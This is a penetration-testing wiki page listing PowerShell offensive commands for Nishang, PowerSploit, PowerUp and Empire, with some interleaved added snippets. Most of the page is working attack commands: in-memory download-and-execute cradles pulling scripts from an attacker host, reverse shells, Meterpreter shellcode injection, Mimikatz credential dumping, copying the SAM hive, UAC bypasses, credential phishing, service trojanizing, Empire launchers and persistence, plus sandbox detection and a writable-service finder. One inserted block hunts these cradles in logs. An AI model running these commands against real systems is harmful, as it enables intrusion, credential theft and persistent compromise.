PowerShell frameworks

From pentestwiki.org


To check the version:

PS>$PSVersionTable.PSVersion

PowerShell v1.0: Win XP SP2, Server 2003 SP1, Vista
PowerShell v2.0: Win 7, Server 2008 R2
PowerShell v3.0: Win 8, Server 2012
PowerShell v4.0: Win 8.1, Server 2012 R2
PowerShell v5.0: Win 10 (v5.1 from the Anniversary Update onwards), Server 2016

Change default colors:

PS>$host.ui.RawUI.ForegroundColor = "black"
PS>$host.ui.RawUI.BackgroundColor = "white"

To compile a .ps1 into an .exe, use the PowerGUI Pro script editor.

  • List hotfixes

PS>Get-HotFix

Equivalent using wmic:

PS>wmic qfe list

  • Detect sandboxed environment (a virtual machine's BIOS vendor and serial number usually give it away)
PS>Get-WmiObject Win32_BIOS | Format-List Name,SerialNumber
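As an added example (not from pentestwiki.org and not Nishang's Check-VM), the BIOS check above extended into a small VM/sandbox heuristic that also inspects Win32_ComputerSystem. The vendor strings are an assumed, non-exhaustive list; a clean result does not prove a physical host. It uses Get-CimInstance, so it needs PowerShell v3 or later (use Get-WmiObject on v2).

```powershell
# Added example (not from pentestwiki.org or Nishang's Check-VM): extend the BIOS
# check into a small VM/sandbox heuristic. Needs PowerShell v3+ for Get-CimInstance.
function Test-VirtualMachine {
    # Vendor strings hypervisors commonly expose; an assumed, non-exhaustive list
    $markers = 'VMware', 'VirtualBox', 'innotek', 'Virtual Machine', 'QEMU', 'KVM', 'Xen', 'Parallels', 'Bochs'

    $bios = Get-CimInstance -ClassName Win32_BIOS
    $cs   = Get-CimInstance -ClassName Win32_ComputerSystem

    # Fields worth inspecting, keyed by name so hits are self-describing
    $fields = [ordered]@{
        BiosManufacturer   = $bios.Manufacturer
        BiosSerialNumber   = $bios.SerialNumber
        BiosVersion        = ($bios.BIOSVersion -join ' ')
        SystemManufacturer = $cs.Manufacturer
        SystemModel        = $cs.Model
    }

    $hits = New-Object System.Collections.Generic.List[string]
    foreach ($kv in $fields.GetEnumerator()) {
        foreach ($m in $markers) {
            if ($kv.Value -and ($kv.Value -like "*$m*")) {
                $hits.Add("$($kv.Key)=$($kv.Value)")
                break
            }
        }
    }

    # Some hypervisors and sandboxes report a blank or zero serial number
    if ([string]::IsNullOrWhiteSpace($bios.SerialNumber) -or $bios.SerialNumber.Trim() -eq '0') {
        $hits.Add('BiosSerialNumber=<blank or 0>')
    }

    # Windows 10 / Server 2016 and later expose whether a hypervisor is present.
    # Note: also true on a physical host running Hyper-V or virtualization-based security.
    if ($cs.PSObject.Properties['HypervisorPresent'] -and $cs.HypervisorPresent) {
        $hits.Add('HypervisorPresent=True')
    }

    [pscustomobject]@{
        IsVirtual  = ($hits.Count -gt 0)
        Indicators = $hits.ToArray()
    }
}

Test-VirtualMachine | Format-List
```

Run it from any PowerShell prompt; no elevation is required because both WMI classes are readable by standard users.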

  • Handling Certificates

To see installed certificates (Cert:\LocalMachine on its own lists the machine's stores; append \My to list the machine's personal certificates):

PS>Get-ChildItem -Path "Cert:\CurrentUser\My"
PS>Get-ChildItem -Path "Cert:\LocalMachine"

Using the GUI: certmgr.msc (current user store) or certlm.msc (local machine store, Windows 8 / Server 2012 and later).


To create a self-signed certificate (New-SelfSignedCertificate ships with the PKI module on Windows 8.1 / Server 2012 R2 and later; writing to the LocalMachine store requires an elevated prompt):

PS>$cert = New-SelfSignedCertificate -CertStoreLocation cert:\LocalMachine\My -DnsName testcert.example.org

  • Show system uptime
PS>Get-CimInstance -ClassName Win32_OperatingSystem | Select-Object CSName, LastBootUpTime


Capturing a screenshot

Save the following as a .ps1 and run it with -Path pointing at an existing directory. The original listing lacked the param() wrapper and the Bitmap.Save call, so it produced no file; both are restored here.

param(
    [Parameter(Mandatory = $true)][string]$Path
)
$FileName = "$env:COMPUTERNAME - $(Get-Date -f yyyy-MM-dd_HHmmss).bmp"
$File = Join-Path $Path $FileName
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName System.Drawing
# VirtualScreen spans all attached monitors
$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
$Width = $Screen.Width
$Height = $Screen.Height
$Left = $Screen.Left
$Top = $Screen.Top
$bitmap = New-Object System.Drawing.Bitmap $Width, $Height
$graphic = [System.Drawing.Graphics]::FromImage($bitmap)
$graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size)
# Write the capture to disk and release the GDI handles
$bitmap.Save($File)
$graphic.Dispose()
$bitmap.Dispose()
Write-Output "Screenshot saved to:"
Write-Output $File

Source: https://www.pdq.com/blog/capturing-screenshots-with-powershell-and-net/


Nishang is a framework and collection of scripts and payloads that enables the use of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of a penetration test.

In Kali: /usr/share/nishang

C:>powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Port-Scan.ps1'; Port-Scan -StartAddress <start-ip> -EndAddress <end-ip> -ResolveHost -ScanPort}"

C:>powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Remove-Update.ps1'; Remove-Update KB2534366}"

C:>powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Invoke-CredentialsPhish.ps1'; Invoke-CredentialsPhish}"

C:>powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Get-PassHashes.ps1'; Get-PassHashes}"

  • Fileless execution (the script is downloaded into memory and evaluated with IEX; nothing touches disk)
C:>powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP/Check-VM.ps1'); Check-VM"

  • Does not work on Windows 7:
C:>powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP/winpost/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 443"

  • On Windows 7, download the script to disk and import it instead:
C:>powershell -ep bypass -command "(New-Object Net.WebClient).DownloadFile('http://$IP/winpost/Invoke-PowerShellTcp.ps1', 'Invoke-PowerShellTcp.ps1'); Import-Module .\Invoke-PowerShellTcp.ps1; Invoke-PowerShellTcp -IPAddress $LOCALIP -Reverse -Port 443"
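The cradles above leave a trace when PowerShell script block logging is enabled (event ID 4104 in the Microsoft-Windows-PowerShell/Operational log). The hunt below is an added example, not part of pentestwiki.org, Nishang or PowerSploit; it assumes script block logging is turned on (Group Policy: Turn on PowerShell Script Block Logging) and that the caller can read that log. The regexes are an assumed starting point built from the commands on this page.

```powershell
# Added example (not from pentestwiki.org, Nishang or PowerSploit): hunt the PowerShell
# operational log for the download-and-execute cradles shown above. Assumes script block
# logging is enabled (event ID 4104) and the current user can read that log.
function Find-DownloadCradle {
    param(
        [datetime]$Since = (Get-Date).AddDays(-7),
        [int]$MaxEvents = 5000
    )
    # Regexes derived from the cradles on this page; an assumed starting point, tune to taste.
    # 4104 logs the decoded script, so '-enc' only shows up when a script spawns a second
    # encoded powershell.exe (as Empire launchers do).
    $patterns = @(
        'Net\.WebClient.*DownloadString',
        'Net\.WebClient.*DownloadFile',
        '\bIEX\b|Invoke-Expression',
        'Invoke-PowerShellTcp|Invoke-Shellcode|Invoke-Mimikatz|Invoke-NinjaCopy|Get-PassHashes',
        '-enc(odedcommand)?\s+[A-Za-z0-9+/=]{20,}'
    )

    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = $Since
    }

    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # 4104 properties: MessageNumber, MessageTotal, ScriptBlockText, ScriptBlockId, Path
            $text = [string]$_.Properties[2].Value
            $matched = @($patterns | Where-Object { $text -match $_ })
            if ($matched.Count -gt 0) {
                $flat = $text -replace '\s+', ' '
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    User    = $_.UserId
                    Path    = $_.Properties[4].Value   # empty for interactive or in-memory blocks
                    Matched = ($matched -join '; ')
                    Snippet = $flat.Substring(0, [Math]::Min(160, $flat.Length))
                }
            }
        }
}

Find-DownloadCradle | Sort-Object Time | Format-Table -AutoSize -Wrap
```

An empty Path with a DownloadString hit is the in-memory case from the page; a populated Path pointing at a freshly written .ps1 corresponds to the Windows 7 DownloadFile variant. The IEX pattern on its own is noisy on administrator workstations, so treat it as a weak signal unless it co-occurs with one of the others.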

Other useful modules:

  • Powerpreter
  • Out-CHM
  • Out-Word
  • Out-Excel
  • Out-HTA


C:>powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP:8000/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $LOCALIP -Lport 4444 -Force"

PS>IEX (New-Object Net.WebClient).DownloadString("http://$IP:8000/Recon/Invoke-ReverseDnsLookup.ps1"); Invoke-ReverseDnsLookup -IpRange $IP/24

PS>IEX (New-Object Net.WebClient).DownloadString("http://$IP:8000/Exfiltration/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -DumpCreds

PS>IEX (New-Object Net.WebClient).DownloadString("http://$IP:8000/Exfiltration/Invoke-NinjaCopy.ps1"); Invoke-NinjaCopy -Path "C:\Windows\System32\config\SAM" -LocalDestination "C:\Users\master\Desktop\SAM"


PowerUp is a PowerShell tool to assist with local privilege escalation on Windows systems. It contains several methods to identify and abuse vulnerable services, as well as DLL hijacking opportunities, vulnerable registry settings, and escalation opportunities. It is part of PowerSploit and resides at https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc. Empire implements PowerUp’s escalation functionality in the privesc/powerup/* modules.

C:>powershell.exe -nop -exec bypass

PS>Import-Module .\PowerUp.ps1

PS>Invoke-AllChecks | Out-File -Encoding ASCII checks.txt


PS>import-module .\bypass-uac.ps1

Does not work on Windows Server 2012:

PS>Bypass-UAC -Method UacMethodSysprep

Works on Windows Server 2012:

PS>Bypass-UAC -Method ucmDismMethod
PS>Bypass-UAC -Method UacMethodMMC2

More info:

Trojanize DLL

See also Msfvenom payloads

Trojanize Windows Service

PS>Write-ServiceBinary [-Name] <String> [-UserName <String>] [-Password <String>] [-LocalGroup <String>] [-Credential <PSCredential>] [-Command <String>] [-Path <String>]

Source: https://powersploit.readthedocs.io/en/latest/Privesc/Write-ServiceBinary/
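Write-ServiceBinary only pays off when the service's executable can actually be replaced. The check below is an added example, not PowerUp's own Get-ModifiableServiceFile: it lists services whose binary the current user's token holds write-class rights on. It assumes the simple path parsing shown, and generic rights (GENERIC_WRITE / GENERIC_ALL, which appear as raw numbers in FileSystemRights) are not decoded, so a service may still be writable without being listed.

```powershell
# Added example (not PowerUp's Get-ModifiableServiceFile): list services whose binary
# the current user's token can modify, the precondition for swapping in a
# Write-ServiceBinary payload. Generic rights (GENERIC_WRITE/GENERIC_ALL) are not decoded.
function Get-WritableServiceBinary {
    $id   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    # SIDs the token carries: the user plus every group (Everyone, Authenticated Users, ...)
    $sids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })

    # Rights that let us replace or alter the file; Write, Modify and FullControl all contain these
    $dangerous = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'

    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc = $_
        if (-not $svc.PathName) { return }

        # Strip arguments: a quoted path, or (unquoted) everything up to the first .exe
        $exe = if ($svc.PathName -match '^\s*"([^"]+)"') { $Matches[1] }
               elseif ($svc.PathName -match '^\s*(.+?\.exe)') { $Matches[1] }
               else { ($svc.PathName -split ' ')[0] }
        $exe = [Environment]::ExpandEnvironmentVariables($exe)
        if (-not (Test-Path -LiteralPath $exe)) { return }

        try { $acl = Get-Acl -LiteralPath $exe -ErrorAction Stop } catch { return }

        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            $aceSid = $null
            try { $aceSid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { continue }
            if ($sids -notcontains $aceSid) { continue }
            if (($ace.FileSystemRights -band $dangerous) -ne 0) {
                [pscustomobject]@{
                    Service   = $svc.Name
                    RunsAs    = $svc.StartName
                    State     = $svc.State
                    Binary    = $exe
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                }
                break   # one finding per service is enough
            }
        }
    }
}

Get-WritableServiceBinary | Format-Table -AutoSize
```

A hit where RunsAs is LocalSystem and the binary lives outside a protected directory is the classic target: replace the file with the output of Write-ServiceBinary and restart the service (or wait for a reboot). Services that run as a virtual or low-privilege account are less interesting, and a file the ACL says is writable may still be locked while the service is running.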


Empire is a PowerShell and Python post-exploitation agent.


root #cd Empire/
root #./setup/install.sh


root #./empire
(Empire) > listeners

(Empire: listeners) > uselistener http
(Empire: listeners/http) > execute
(Empire: listeners/http) > launcher powershell
powershell -noP -sta -w 1 -enc SQBmACgAJA<REDACTED>QB8AEkARQBYAA==

(Empire: listeners/http) >

Run the generated PowerShell launcher on the Windows target to open a session in Empire:

C:>powershell -noP -sta -w 1 -enc SQBmACgAJA<REDACTED>QB8AEkARQBYAA==

To handle agents in Empire:

(Empire) > agents
(Empire: agents) > interact <AGENTID>
(Empire: agents) > rename <old name> <new name>

Advanced modules (typed at the agent's prompt; a module selected with usemodule takes its listener via set Listener):

(Empire: <AGENTID>) > bypassuac http
(Empire: <module>) > set Listener http

or disk-less:

(Empire: <AGENTID>) > usemodule privesc/bypassuac_wscript

Credentials gathering:



(Empire: <AGENTID>) > usemodule persistence/elevated/schtasks



A Powershell Privilege Escalation Enumeration Script